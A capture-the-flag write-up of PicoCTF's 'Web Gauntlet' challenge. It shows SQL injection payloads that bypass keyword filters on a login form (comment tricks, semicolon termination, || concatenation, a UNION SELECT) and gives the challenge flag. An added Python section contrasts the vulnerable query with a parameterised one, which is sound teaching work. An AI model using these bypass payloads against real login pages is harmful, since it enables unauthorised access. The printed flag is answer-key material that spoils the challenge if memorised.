PicoCTF Writeup – Web Gauntlet

Information:

CTF Name: PicoCTF

CTF Challenge: Web Gauntlet

Challenge Category: Web Exploitation

Challenge Points: 200

PicoCTF 2020 Mini-Competition.

# Challenge Description:

Can you beat the filters? Log in as admin http://jupiter.challenges.picoctf.org:40791/ http://jupiter.challenges.picoctf.org:40791/filter.php

Hints: You are not allowed to login with valid credentials. Write down the injections you use in case you lose your progress. For some filters it may be hard to see the characters, always (always) look at the raw hex in the response. sqlite. If your cookie keeps getting reset, try using a private browser window

Writeup

In this challenge we have two URLs. The first one points us to a login page, as you can see below:

And the second link has a list of the filters present in this login page for each round, see below:

Round1: or

Well, it seems that we have to pass 5 challenges to get the flag.

Round 1

In the first one, we know that we cannot use the word "or" to bypass this. We also know from the description that we want to log in as admin. So what we can try to do is insert admin as the username and a random value for the password; the result:

As you can see we are given the full query on the top left corner, which is:

SELECT * FROM users WHERE username='admin' AND password='pass'

I inserted admin as the username and pass as the password. It did not work, but we managed to get the query, which helps a lot! If you know SQL, you know that this command returns the user whose username and password are equal to the ones provided. We do not know the password, but we can try to, for example, comment out everything after the username, ignoring the AND. As such:

SELECT * FROM users WHERE username='admin' -- AND password='pass'

Whatever comes after "--" is commented out, so it will be ignored, and what the query now does is select all users with the username admin. Below you have the input values; for the password you can insert anything, since it is commented out it will not matter:

Round 2

Round2: or and like = --

In this one, we cannot use the -- comment. However, we know that this is SQLite and there are 2 types of comments, the -- and the /**/. It is quite clear that we can simply use the other one as we did before, as such:

SELECT * FROM users WHERE username='admin' /* AND password='pass'

Like this, we once again bypass the password and simply query for the username admin. Below you have the input image:

Round 3

Round3: or and = like > < --

It seems that we can still use the /**/; however, once I tried it I did not succeed in logging in. It must be something else. After searching around for a while, I remembered that the ";" represents the end of a query statement. I decided to just give it a go!

SELECT * FROM users WHERE username='admin'; AND password='pass'

The SQL statement ends at ";"; everything after it is another statement, or is treated as an error.

Round 4

Round4: or and = like > < -- admin

This one is harder! It seems that we cannot use the word admin! In that case, how can we log in as admin at all? I had a few ideas; for instance, we could try to write:

adadminmin   

I thought that this way the admin word in red would be removed and we would end up with admin; however, this did not work. After searching and trying several things for a while I was able to find out that "||" represents concatenation in SQLite. So, I decided to try this, as such:

SELECT * FROM users WHERE username='ad'||'min'; AND password='pass'

What this does is simply concatenate the ad with the min, making it admin, and finish the statement at the ;. See the image below:

There is another way, using the UNION statement, based on this PortSwigger article.

The article presents the problem of white spaces, and, combining that with the UNION command, we can also bypass the input, as such:

SELECT * FROM users WHERE username='mregra'/**/UNION/**/SELECT/**/*/**/FROM/**/users/**/LIMIT/**/1; AND password='pass'

What this SQL statement does is make two queries; the first one is:

SELECT * FROM users WHERE username='mregra'

And the second one is:

SELECT/**/*/**/FROM/**/users/**/LIMIT/**/1;

The UNION simply combines the two SELECT statements; the /**/ between all the words represents the white space, as described in the PortSwigger article. And we have to include the LIMIT 1 part because usually, in a database, the admin is the first entry of the table, and with this command we simply retrieve the first row, which in this case is the admin; see the image below:
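To show why the per-round keyword filters never close the hole in rounds 1 through 4, here is an added example (not part of the original writeup or of the challenge's own code) that rebuilds the echoed query in two ways: concatenated from the input, as the challenge does, and with bound parameters. The table schema, the sample passwords, the `passes_denylist` filter logic and all function names are assumptions; the page only shows the query string and the banned words per round. Python's `sqlite3` driver executes exactly one statement per `execute()` call and raises `ProgrammingError` when anything follows it, so the `;` payloads of rounds 3 and 4 cannot be reproduced with this driver; the comparison uses the round 1 and round 2 payloads from the writeup.

```python
import sqlite3

# Constructed sample table: the page only shows the query the challenge echoes, not the
# schema or the stored rows, so these column names and passwords are assumptions.
SAMPLE_USERS = [
    ("admin", "placeholder-admin-password"),
    ("mregra", "placeholder-user-password"),
]


def make_db():
    """Build an in-memory SQLite database shaped like the challenge's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def passes_denylist(value, banned):
    """Keyword denylist in the spirit of the challenge's per-round filters.

    Assumption: filter.php's exact matching logic is not on the page; this rejects any
    case-insensitive substring match, the most common (and still bypassable) form.
    """
    lowered = value.lower()
    return not any(word in lowered for word in banned)


def vulnerable_login(conn, username, password, banned=()):
    """Login built by string formatting, giving exactly the query the challenge displays.

    Returns the matched username, or None when the filter rejects the input or no row
    matches.
    """
    if not (passes_denylist(username, banned) and passes_denylist(password, banned)):
        return None
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver never lets input become SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


ROUND1_BANNED = ("or",)
ROUND2_BANNED = ("or", "and", "like", "=", "--")


def demo():
    """Run the writeup's round 1 and round 2 payloads against both implementations."""
    conn = make_db()
    return {
        # Round 1: "--" comments out the password check, so the admin row comes back.
        "round1_vulnerable": vulnerable_login(conn, "admin' -- ", "pass", ROUND1_BANNED),
        # Round 2: "--" is now banned, but SQLite's other comment form "/*" is not, and an
        # unterminated block comment runs to the end of the input.
        "round2_vulnerable": vulnerable_login(conn, "admin' /*", "pass", ROUND2_BANNED),
        # The round 2 denylist does stop the round 1 payload, which is all a denylist
        # ever does: block the last trick it has seen.
        "round1_payload_in_round2": vulnerable_login(conn, "admin' -- ", "pass", ROUND2_BANNED),
        # The same payloads against the parameterised query are just usernames that do
        # not exist, so no row matches.
        "round1_safe": safe_login(conn, "admin' -- ", "pass"),
        "round2_safe": safe_login(conn, "admin' /*", "pass"),
        # Real credentials still work through the safe path.
        "legit_safe": safe_login(conn, "mregra", "placeholder-user-password"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:26s} -> {outcome}")
```

The lesson the five rounds teach is in the last three results: once the values are bound instead of spliced into the statement, there is no comment syntax, concatenation operator or UNION to filter for, because the input is never parsed as SQL in the first place.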

Round 5

Round5: or and = like > < -- union admin

For this round, we cannot use the second method from the previous round, but it seems that we can still use the first method. I decided to give it a go and it worked! See the image below:

Once I signed in, a message appeared: "Congrats! You won! Check out filter.php". The contents of filter.php are in the image below:

And the flag is:  

picoCTF{y0u_m4d3_1t_96486d415c04a1abbbcf3a2ebe1f4d02}

Thank you very much for reading!

Cheers,

MRegra

